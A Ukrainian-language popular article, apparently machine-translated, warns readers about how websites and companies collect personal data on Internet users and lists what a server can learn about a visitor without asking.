Усі програми, за допомогою яких Ви отримуєте Інтернет хоч яку-небудь інформацію, попередньо повідомляють відправнику цієї інформації свої, а отже і Ваші „реквізити“, тобто деякі відомості, які визначають куди, в якому вигляді і які саме дані потрібно відправити. Згаданий вище набір — це мінімум, без якого взагалі неможливий ніякий обмін інформацією, причому не тільки в Інтернеті. Але максимум передаються при запиті відомостей ніяк не обмежений, оскільки донедавна визначався виключно міркуваннями зравого сенсу. Навіщо, наприклад, при відправленні декількох рядків тексту поштою відправляти „на всяк випадок“ ще і вміст всієї дискової або оперативної пам’яті комп’ютера? Хоча як знати, може комусь це буде цікаво. Наприклад, фірмі продає програми і бажає знати, чи використовують їх продукцію заплатили за неї. Або керівництву компанії, занепокоєному витоком інформації і не виключає, що хтось із співробітників може зберігати службові матеріали на своєму домашньому комп’ютері, потихеньку приторговуючи ними. Або… та хіба мало у світі цікавих? А от якщо, скажімо, буде відправлятися не вся пам’ять, а лише деякі дані? Наприклад, список адресатів електронної пошти, службового і особистого — окремо? Або перелік серверів та сторінок Інтернет, до яких з цього комп’ютера звертаються найчастіше? Або час, коли комп’ютер включають і вимикають?
По мірі здешевлення засобів зберігання і обробки даних починають поширюватися системи витонченого збору та аналізу таких відомостей, які ніхто раніше не звертав увагу. Що, якщо в суспільній електронній бібліотеці, що має докладні матрериалы з практично будь-якої тематики, протягом тривалого часу вести облік з точністю до найменших деталей, фіксуючи хто саме і що саме читав, на яких абзацах затримувався, а що пропускав? Обробляючи і зіставляючи ці дані з іншими (наприклад, з реєстраційними: вік, професія, стать та ін) можна отримати відомості, що мають величезну цінність для тих, хто знає як їх застосувати. Адже Інтернет — це саме така бібліотека…
До того, що статистика знає все, ми вже встигли звикнути. Але з’явилася в останній час можливість цілеспрямованого збору саме особистої інформації про користувачів Мережі з метою її подальшого продажу або безпосереднього використання збирають викликає певне занепокоєння. Причому характер цієї інформації може значно відрізнятися від того, що ми звикли вважати відомостями, які слід приховувати від сторонніх, як-то: паролі, номери банківських рахунків і кредитних карт, розклад роботи та інші „ключі від квартири, де гроші лежать“.
Мова йде про інтенсивний збір досить нешкідливих з вигляду дані: рівень Ваших доходів (хоч в розвинених країнах це питання вважається непристойним), суспільне, сімейне та службове становище, склад сім’ї, характер витрат, плани щодо придбання тих чи інших товарів і послуг, Ваші смаки і переваги, і інше. Всі ці питання здавна ставлять служби дослідження ринку та підвищення ефективності відділів продажів. До недавніх пір це була просто статистика, допомагає розвивати виробництво і формувати ринок згідно з побажаннями більшості покупців. Але з появою можливості надання послуг і проведення анкетування через Інтернет ситуація змінилася. Тепер будь-який власник сервера, привабливого для широкої аудиторії, може за розумний час і реальні гроші скласти на кожного з відвідувачів досьє, якому може позаздрити інша спецслужба.
Що саме вони знають?
Отже, що можна дізнатися про Вас, не задавши жодного питання і не встановлюючи на комп’ютер свої програми (ця можливість, природно, дасть ще більший ефект)?
Місцезнаходження (країна, фірма, Інтернет-кафе, Інтернет провайдер тощо) Тип Вашого комп’ютера Дозвіл екрану, з якого Ви дивитеся на їх сторінку Місцевий час (по годинах Вашого комп’ютера Операційну систему, в якій Ви зараз працюєте Тип і версію програми, з якої Ви звернулися до сервера Працюєте з того ж самого (фізичної) комп’ютера, що і минулого разу Наявність цифрового посвідчення (сертифіката) і з нього — реєстраційні дані, з якими Ви його отримали. Шифрується інформація по дорозі між Вами і сервером, і якщо так, то яким саме способом, і від кого Ви отримали ключ (при наявності сертифіката) Які саме сторінки або файли Ви отримали (або регулярно забираєте) з їх сервера За якими посиланнями (в першу чергу, рекламних банерів) з їх сторінок „ходите“, а які завжди залишаєте без уваги Яку сторінку дивилися до того, як потрапили до них, і куди пішли після цього Які питання задаєте їх пошуковій системі На які бюлетені (списки розсилки) підписані Які групи новин (USENET) читаєте, в які і що пишете
Н?